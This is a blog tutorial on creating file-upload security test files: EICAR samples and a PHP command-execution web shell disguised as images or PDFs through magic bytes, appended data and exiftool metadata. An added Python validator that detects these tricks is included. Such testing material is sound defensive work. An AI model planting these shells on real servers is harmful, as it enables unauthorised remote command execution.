DEV Community

whatminjacodes [she/they]

How to Create Security Test Files for File Upload

I created a bunch of test files for security testing file upload functionalities and decided to write this walkthrough on how each file was created!

You can also download the test files from my GitHub, but hopefully people doing security testing don't download random files from the internet :D Instead, it's better to understand how the files work and create them from scratch.

If you're not familiar with file upload testing in general, you can, for example, read the PortSwigger tutorial about it.

So here are the instructions on how to create these test files yourself.

File upload test files

Here's the list of files covered in this walkthrough:

  • regular-excel-document.xlsx
  • regular-pdf-document.pdf
  • regular-png-file.png
  • regular-text-document.txt
  • regular-word-document.docx
  • eicar-text-document.txt
  • eicar-excel-document.xlsx
  • eicar-word-document.docx
  • php-shell.php
  • php-shell-directly-in-image.png
  • php-shell-added-to-end-png-magic-bytes.php
  • php-shell-with-jpeg-magic-bytes.php
  • php-shell-with-pdf-magic-bytes.php
  • png-file-with-php-payload-in-comment-metadata.png
  • php-shell-with-php-payload-in-png-comment-metadata-png-magic-bytes.php

Regular files

These are files that don’t have anything special in them.

  • The Excel file is just a regular spreadsheet created in Excel with some text and a =1+1 calculation.
  • The Word document is created with Word and includes some text.
  • The PDF file is exported from the Word document above and also contains some text.
  • The text document is simply a .txt file with some text in it.
  • The .png file is just a small image file.

Sometimes you just need to check that the file upload works as intended, and the best way to do that is to use the kind of files the service is expecting to get.

EICAR files

⚠️ Important note: EICAR files will likely trigger your antivirus software. However, these are non-malicious files. It's a good idea to create them inside a VM or exclude the folder where you're creating them from your antivirus scans.

What is EICAR?

The EICAR Anti-Virus Test File is a file designed for testing antivirus software without using real malware. It’s a benign file that gets flagged as malicious by antivirus engines. EICAR files can be used to check whether file uploads are scanned for malware.

The file is a legitimate DOS program made up of 68 printable ASCII characters. If run, it prints the message "EICAR-STANDARD-ANTIVIRUS-TEST-FILE!".

eicar-text-document.txt

Create a new text document and paste the following string into it:

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

eicar-excel-document.xlsx

Create a new Excel document, go to Insert → Text → Object → Create from File, and attach the previously created EICAR text file. Then save the document.

eicar-word-document.docx

Create a new Word document, go to Insert → Object → Create from File, and attach the previously created EICAR text file. Save the document.

PHP shells

The goal of uploading a PHP shell is to test whether the application allows the upload of executable code and whether that code can actually be executed. These are simple examples, so you should modify the payloads to suit your specific test environment.

php-shell.php

Create a new text file and paste the following code into it:

<?php system($_REQUEST['cmd']); ?>

Save the file and rename it to .php, or use the following Linux command to create the file:

echo "<?php system(\$_REQUEST['cmd']); ?>" >> php-shell.php

php-shell-directly-in-image.png

Same as above, but save the file with a .png extension, or use:

echo "<?php system(\$_REQUEST['cmd']); ?>" >> php-shell-directly-in-image.png

PHP shells using magic bytes

Magic bytes are the first few bytes of a file and are used to identify the file type. They’re also known as the file signature.

By setting the magic bytes, we can make a file look like, for example, an image, when it is actually a PHP shell.

php-shell-added-to-end-png-magic-bytes.php

Create this file by appending the payload to the end of a regular .png file and renaming it:

echo "<?php system(\$_REQUEST['cmd']); ?>" >> regular-png-file.png && mv regular-png-file.png php-shell-added-to-end-png-magic-bytes.php

That command first appends <?php system($_REQUEST['cmd']); ?> to the end of the existing regular-png-file.png (echo combined with >>, which appends rather than overwrites, so the PNG magic bytes at the start of the file are kept), and then runs mv, which renames the file.

php-shell-with-jpeg-magic-bytes.php

Use a hex editor to change the first bytes of php-shell.php to:

FF D8 FF DB

These bytes make it look like the file is a .jpeg. I used hexedit for changing the bytes and xxd for checking if the change was successful.

⚠️ You may need to add a few characters to the beginning of the file before the payload, as changing the initial bytes might overwrite part of it.

php-shell-with-pdf-magic-bytes.php

Change the first bytes of php-shell.php to:

25 50 44 46 2D

This makes the file appear to be a .pdf.

⚠️ Again, you may need to insert a few characters before the payload to prevent part of it from being overwritten.

png-file-with-php-payload-in-comment-metadata.png

Use exiftool to add a PHP shell payload as a comment in a PNG image:

exiftool -comment="<?php system(\$_REQUEST['cmd']); ?>" png-file-with-php-payload-in-comment-metadata.png

You can start from regular-png-file.png. I renamed my copy to png-file-with-php-payload-in-comment-metadata.png before running the command so it would be clear which file contains what.

php-shell-with-php-payload-in-png-comment-metadata-png-magic-bytes.php

Use exiftool to add a PHP shell payload as a comment in a PNG image:

exiftool -comment="<?php system(\$_REQUEST['cmd']); ?>" png-file-with-php-payload-in-comment-metadata.png

This is the same as above, but afterwards rename the .png file to .php. The magic bytes will still correspond to PNG, but the file extension will be .php.
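As an added defender-side example (not code from the original post), here is a small Python validator that applies the checks these test files are designed to exercise: an extension allow-list, magic-byte agreement with the extension, trailing data after a PNG's IEND chunk, PHP tags anywhere in the content (including a tEXt comment written by a tool like exiftool), and the EICAR string. The 1x1 sample PNG is constructed inline so the script runs offline.

```python
import re
import struct
import zlib

# Signatures the post relies on: PNG, JPEG (FF D8 FF ..) and PDF (%PDF-).
MAGIC = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff", "pdf": b"%PDF-"}
PHP_TAG = re.compile(rb"<\?php|<\?=")
EICAR = rb"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"

def png_chunk(ctype: bytes, payload: bytes) -> bytes:
    """Build one PNG chunk: 4-byte length, type, data, CRC32 over type+data."""
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", zlib.crc32(ctype + payload))

def png_end_offset(data: bytes) -> int:
    """Walk the chunk list; return the offset just past IEND, or -1 if absent."""
    pos = 8  # skip the 8-byte signature
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 12 + length  # length + type + data + CRC
        if ctype == b"IEND":
            return pos
    return -1

def check_upload(data: bytes, filename: str) -> list:
    """Return the findings for one upload; an empty list means it passed."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    ext = "jpg" if ext == "jpeg" else ext
    findings = []
    sig = MAGIC.get(ext)
    if sig is None:
        findings.append("extension-not-allowed")  # .php, .txt, no extension ...
    elif not data.startswith(sig):
        findings.append("magic-mismatch")  # named .png but the bytes say otherwise
    if data.startswith(MAGIC["png"]):
        end = png_end_offset(data)
        if end == -1:
            findings.append("png-no-iend")
        elif end < len(data):
            findings.append("data-after-iend")  # something appended to a real PNG
    if PHP_TAG.search(data):
        findings.append("php-tag")  # inline, appended, or inside a tEXt comment
    if EICAR in data:
        findings.append("eicar")
    return findings

# Constructed 1x1 greyscale PNG used as sample input (not a file from the post).
SAMPLE_PNG = (MAGIC["png"] + png_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
              + png_chunk(b"IDAT", zlib.compress(b"\x00\x00")) + png_chunk(b"IEND", b""))
```

Run check_upload over each of the test files above to see which variants a given check catches; the PHP-tag scan is the only one that flags the comment-metadata PNG, since its extension, magic bytes and chunk structure are all legitimate.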

Background

I hope this tutorial was useful to you! As an Information Security Specialist at 2NS, I get to learn something new about cybersecurity every day. Through this blog, I aim to share tools and techniques that I find valuable in my work, hoping to help others in the field.

Follow me on Instagram @minjahakkeroi for a behind-the-scenes look at my work as an ethical hacker, and to learn more cybersecurity tips and insights!

Top comments (2)

BernerT

Great walkthrough! Do you have any recommendations for further reading or resources on file upload security testing or crafting specialized test files?

whatminjacodes [she/they]

Thanks! I like the OWASP documentation, so if you are not familiar with that then I recommend checking it out!